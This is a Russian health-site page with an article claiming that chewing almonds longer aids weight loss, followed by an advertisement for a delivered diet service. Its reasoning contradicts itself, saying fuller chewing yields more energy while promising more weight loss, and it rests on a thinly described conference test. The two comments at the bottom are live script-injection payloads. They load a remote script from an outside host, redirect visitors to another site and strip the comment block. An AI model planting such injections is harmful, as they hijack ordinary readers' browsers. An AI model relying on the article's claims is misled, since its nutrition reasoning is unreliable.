Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Чем больше жуешь – тем бо...  >>  Чем больше жуешь – тем больше худеешь!
 
Обратная связь
 

Чем больше жуешь – тем больше худеешь!

Размер шрифта
02 декабря 2013 00:00
Юрий Малышев
Здоровье инфо
Татьяна Дубровская
Здоровье инфо
  • google_analytics: false
  • Нравится

Жуйте дольше, чтобы запастись энергией!

Чем больше жуешь – тем больше худеешь!

Миндаль считается одним из самых главных источников энергии. Оказывается, дело не в том, сколько вы съели, а в том, какое количество времени вы жуете.

15 июля 2013 года состоялось ежегодное совещание института пищевых технологий. Исследование проводилось на участниках конференции. Испытуемые пережевывали миндаль 10, 25 и 40 раз, после чего им измеряли уровень липидов в кале и количество потраченных на жевание калорий. В результате оказалось, что более мелкие частицы легче усваивались организмом, чем более крупные. То есть чем тщательнее мы пережевываем пищу, тем большее количество питательных веществ мы получаем, следовательно, тем больше энергии запасаем.

Если вы заинтересованы в максимальном извлечении полезных веществ из того же миндаля, то вам нужно его нарезать  на мелкие кусочки, перетереть, или же добавлять в пищу миндальное масло.

Также к высокоэнергетичным продуктам относят грубые волокна, содержащиеся в сырых овощах, фруктах, продуктов из цельного зерна. Волокно связывает жирные кислоты для создания депо энергии в организме. Плюс грубые волокна невозможно пережевать быстро. Поэтому если вы хотите похудеть с большей эффективностью, то вам следует включить в свой рацион больше грубых волокон.

Сведения о более чем 200 продуктах, включающие подробное описание состава продуктов, были получены еще 125 лет назад. И мы до сих пор пользуемся этими данными.

Однако потребности людей в калорийности меняются, меняется и их рацион, поэтому на данный момент следует пересмотреть некоторые данные об энергетической ценности продуктов.

В декабре 2012 года Европейский союз опубликовал новые положения об энергетической ценности пищевых продуктов, а также новые данные о химическом составе (микро- и макроэлементах) продуктов. Новые правила о подсчете калорийности продуктов будут введены уже в декабре 2014 года.

Ну, а если вы не хотите считать калории, а хотите реально худеть – специально для вас создана «Диета Елены Малышевой». Уже готовая правильная еда будет доставлена в любое удобное для вас место и время! Вам останется только есть и ХУДЕТЬ!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:51

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:51

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Старт нового сезона проекта «Сбрось лишнее»   Бойтесь своих друзей, если хотите похудеть   Выключите компьютер! Из-за него вы толстеете!   Диета по группе крови – полный обман! Как реально похудеть?  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 

Слайдшоу

1
Как похудеть, ничего не делая
Как натренировать волю и похудеть?
Еда для плоского живота. Часть 2

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.